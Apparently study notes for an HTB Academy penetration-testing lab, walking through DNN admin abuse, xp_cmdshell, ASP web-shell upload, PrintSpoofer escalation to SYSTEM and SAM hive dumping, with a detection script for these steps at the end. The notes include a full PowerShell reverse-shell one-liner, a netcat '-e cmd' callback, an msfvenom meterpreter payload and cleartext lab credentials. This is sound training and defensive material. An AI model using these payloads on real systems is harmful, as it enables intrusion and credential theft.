# Exploitation & Privilege Escalation

## Overview

Exploitation & Privilege Escalation transforms credential discovery into SYSTEM-level access on internal hosts. Leverage DotNetNuke (DNN) administrative access, enable xp_cmdshell, exploit the SeImpersonate privilege with PrintSpoofer, and establish multiple persistence methods for reliable internal network control.

## DotNetNuke (DNN) Exploitation

### Administrative Access

```
# Credential validation from NFS discovery
Administrator:D0tn31Nuk3R0ck$$@123
# Source: /DEV01/DNN/web.config

# Login verification
http://172.16.8.20/Login?returnurl=%2fadmin
# Result: SuperUser administrator account access

# Findings to document:
1. Insecure File Shares (NFS anonymous access)
2. Sensitive Data on File Shares (credentials in config)
```

### SQL Console Exploitation
```sql
-- Enable xp_cmdshell for command execution
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

-- Test command execution (xp_cmdshell runs as the SQL Server service account)
xp_cmdshell 'whoami'
-- Output: nt service\mssql$sqlexpress
```

### File Extension Bypass

```
# DNN file upload configuration:
1. Settings → Security → More → More Security Settings
2. Allowable File Extensions: asp,aspx,exe,SAVE
3. Save configuration

# Upload capabilities enabled:
- ASP web shells (.asp, .aspx)
- Executable files (.exe)
- Registry hive dumps (.SAVE)
```

## Privilege Escalation Techniques
### Web Shell Deployment

```
# ASP web shell upload
1. Download newcmdasp.asp from GitHub
2. Upload via DNN File Management (/admin/file-management)
3. Access web shell via uploaded file URL
4. Test command execution: whoami
# Result: iis apppool\dotnetnukeapppool
# Privileges: SeImpersonate (exploitable)
```

### PowerShell Reverse Shell

```powershell
# Reverse shell payload (from web shell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('172.16.8.120',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

```bash
# Listener setup (on dmz01):
nc -nvlp 9999
# Result: Interactive PowerShell session
```

### PrintSpoofer Exploitation

```
# Prerequisites:
1. Upload nc.exe and PrintSpoofer64.exe via DNN
2. Verify SeImpersonate privilege
3. Set up listener on dmz01

# PrintSpoofer execution:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd"

# Expected output:
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
# Result: NT AUTHORITY\SYSTEM shell
```

## Credential Harvesting
### SAM Database Extraction

```
# Registry hive dumping (as SYSTEM):
reg save HKLM\SYSTEM SYSTEM.SAVE
reg save HKLM\SECURITY SECURITY.SAVE
reg save HKLM\SAM SAM.SAVE

# Download via DNN file manager:
1. Navigate to /admin/file-management
2. Download SYSTEM.SAVE, SECURITY.SAVE, SAM.SAVE
3. Transfer to attack host for analysis
```

### Secretsdump Analysis

```bash
# Credential extraction
secretsdump.py LOCAL -system SYSTEM.SAVE -sam SAM.SAVE -security SECURITY.SAVE

# Local account hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]
mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]

# Domain cached credentials:
INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#[HASH]

# LSA Secrets:
DefaultPassword: Gr8hambino!
# Associated user: hporter (domain account)
```

### Domain Credentials Discovery

```
# First domain credential pair discovered:
hporter:Gr8hambino!
# Source: LSA Secrets DefaultPassword

# Validation from SYSTEM shell:
net user hporter /dom
# Output: Domain Users group membership confirmed
# Password last set: 6/1/2022
# Account active: Yes
```

## Alternative Attack Methods
### Reverse Port Forwarding

```bash
# Scenario: Direct reverse shell from DEV01 to attack host

# 1. Generate payload (target: dmz01 IP)
msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.8.120 -f exe -o teams.exe LPORT=443

# 2. Set up multi/handler (attack host)
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 7000
run

# 3. SSH reverse port forwarding
ssh -i dmz01_key -R 172.16.8.120:443:0.0.0.0:7000 root@TARGET_IP -vN

# 4. Execute payload on DEV01
teams.exe
# Result: Meterpreter session through port forwarding
```

### SSH Configuration Requirements

```bash
# GatewayPorts configuration (if needed):
# Edit /etc/ssh/sshd_config on dmz01:
GatewayPorts yes   # Change from 'no' to 'yes'

# Reload SSH service:
service sshd reload
```

Security considerations:
- Client approval required for config changes
- Document all modifications
- Revert changes post-assessment
- Note security implications in report

## Multiple Access Vectors
### Attack Path Diversity

```
# Method 1: SQL Console → xp_cmdshell
DNN Admin → Settings → SQL Console → Command execution

# Method 2: File Upload → ASP Web Shell
DNN Admin → File Extensions → Upload newcmdasp.asp → RCE

# Method 3: Direct Credential Usage
hporter:Gr8hambino! → SMB/RDP/WinRM access

# Method 4: Pass-the-Hash
Administrator NT hash → Direct authentication
```

### Persistence Mechanisms

Local administrator access:
- SAM database hash extraction
- Pass-the-hash authentication capability
- Local admin account compromise

Domain account access:
- hporter:Gr8hambino! (cleartext)
- Domain Users group membership
- Internal AD enumeration capability

System-level access:
- NT AUTHORITY\SYSTEM shell
- Registry access and modification
- Service manipulation capabilities

## Active Directory Preparation
### Domain Intelligence Gathered

```
# Domain information:
Domain: INLANEFREIGHT.LOCAL
Domain Controller: 172.16.8.3
Domain SID: S-1-5-21-2814148634-3729814499-1637837074

# Compromised accounts:
hporter (Domain Users) - cleartext password
Administrator (DEV01 local) - NT hash
mpalledorous (DEV01 local) - NT hash

# Network positioning:
- SYSTEM access on DEV01 (172.16.8.20)
- Root access on dmz01 (172.16.8.120)
- Direct connectivity to Domain Controller
```

### Next Phase Planning

AD enumeration priorities:
1. BloodHound data collection
2. Domain user enumeration
3. Service account discovery
4. Group membership analysis
5. Trust relationship mapping

Lateral movement opportunities:
- Kerberoasting attacks
- ASREPRoasting attempts
- Password spraying campaigns
- SMB share enumeration
- Privilege escalation hunting

## HTB Academy Labs
### Lab Solution Summary

Lab 1: SAM Database Extraction
1. DNN admin access → Administrator:D0tn31Nuk3R0ck$$@123
2. File extension modification → asp,aspx,exe,SAVE
3. Web shell upload → newcmdasp.asp deployment
4. PrintSpoofer exploitation → SYSTEM privilege escalation
5. Registry hive dumping → SAM, SYSTEM, SECURITY
6. Secretsdump analysis → Administrator NT hash extraction

Lab 2: Administrator Desktop Flag
1. SYSTEM shell establishment → PrintSpoofer execution
2. Privilege verification → NT AUTHORITY\SYSTEM
3. Flag retrieval → C:\Users\Administrator\Desktop\flag.txt

### Key Learning Points

Technical skills:
- DNN administrative functionality abuse
- SQL Server xp_cmdshell exploitation
- SeImpersonate privilege escalation
- Windows registry credential extraction

Professional methodology:
- Multiple attack vector development
- Persistence mechanism establishment
- Evidence collection standards
- Systematic privilege escalation

Real-world scenarios:
- Development environment exploitation
- Configuration file credential mining
- Built-in functionality abuse
- Domain preparation techniques

## Defensive Recommendations
### Application Security

DNN hardening:
- Disable SQL Console access
- Restrict file upload extensions
- Implement admin approval workflows
- Regular credential rotation

SQL Server security:
- Disable xp_cmdshell by default
- Implement least privilege access
- Monitor database admin activities
- Use dedicated service accounts

File share security:
- Disable anonymous NFS access
- Implement proper access controls
- Encrypt sensitive configuration files
- Regular share permission audits
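Each technique in these notes leaves a distinctive parent/child or token pattern in process-creation telemetry: the IIS worker (w3wp.exe) or the SQL engine (sqlservr.exe) spawning a shell, a service-account parent creating a child that runs as SYSTEM (the SeImpersonate/PrintSpoofer step), and reg save of the SAM, SECURITY and SYSTEM hives. The detection logic below is an added example and is not part of the original notes or HTB's material; it runs over constructed events whose fields mirror Sysmon Event ID 1 / Security 4688 and assumes Python 3.8 or newer.

```python
import re
from dataclasses import dataclass

# Parents that should never spawn an interactive shell on a DNN / SQL Server host.
WEB_WORKERS = {"w3wp.exe"}                            # IIS app pool (uploaded web shell)
SQL_ENGINES = {"sqlservr.exe"}                        # MSSQL engine (xp_cmdshell)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SERVICE_PREFIXES = ("iis apppool\\", "nt service\\")  # low-privileged service identities
# Offline registry hive dump, as run from the SYSTEM shell in these notes.
HIVE_SAVE = re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SAM|SECURITY|SYSTEM)\b", re.I)

@dataclass
class ProcEvent:
    """Fields mirror Sysmon Event ID 1 / Security 4688; the names here are our own."""
    parent: str       # ParentImage (file name only)
    parent_user: str  # ParentUser
    image: str        # Image (file name only)
    user: str         # account the new process runs as
    cmdline: str      # CommandLine

def classify(ev: ProcEvent) -> list:
    """Return the detection labels that apply to one event (empty list if none)."""
    hits, parent, image = [], ev.parent.lower(), ev.image.lower()
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("webshell:iis-worker-spawned-shell")
    if parent in SQL_ENGINES and image in SHELLS:
        hits.append("xp_cmdshell:sql-engine-spawned-shell")
    if HIVE_SAVE.search(ev.cmdline):
        hits.append("credential-access:registry-hive-save")
    # SeImpersonate abuse (PrintSpoofer): a service-account parent creates a SYSTEM child.
    # Checked for any image, because the child may be nc.exe rather than cmd.exe.
    if ev.user.lower() == "nt authority\\system" and ev.parent_user.lower().startswith(SERVICE_PREFIXES):
        hits.append("privesc:service-account-to-system")
    return hits

def scan(events):
    # (parent, image, labels) for every event that triggered at least one label
    return [(ev.parent, ev.image, labels) for ev in events if (labels := classify(ev))]

# Constructed sample telemetry modelled on the steps in these notes (not real logs).
SAMPLE_EVENTS = [
    ProcEvent("w3wp.exe", "IIS APPPOOL\\DotNetNukeAppPool", "cmd.exe",
              "IIS APPPOOL\\DotNetNukeAppPool", "cmd.exe /c whoami"),
    ProcEvent("sqlservr.exe", "NT SERVICE\\MSSQL$SQLEXPRESS", "cmd.exe",
              "NT SERVICE\\MSSQL$SQLEXPRESS", "cmd.exe /c whoami"),
    ProcEvent("PrintSpoofer64.exe", "IIS APPPOOL\\DotNetNukeAppPool", "nc.exe",
              "NT AUTHORITY\\SYSTEM", "nc.exe 172.16.8.120 443 -e cmd"),
    ProcEvent("cmd.exe", "NT AUTHORITY\\SYSTEM", "reg.exe",
              "NT AUTHORITY\\SYSTEM", "reg save HKLM\\SAM SAM.SAVE"),
    ProcEvent("explorer.exe", "DEV01\\mpalledorous", "notepad.exe",
              "DEV01\\mpalledorous", "notepad.exe C:\\notes.txt"),
]
```

Calling scan(SAMPLE_EVENTS) returns four flagged events and leaves the notepad.exe launch untouched; in a real pipeline the same classify() can be fed from Sysmon or Security-log exports.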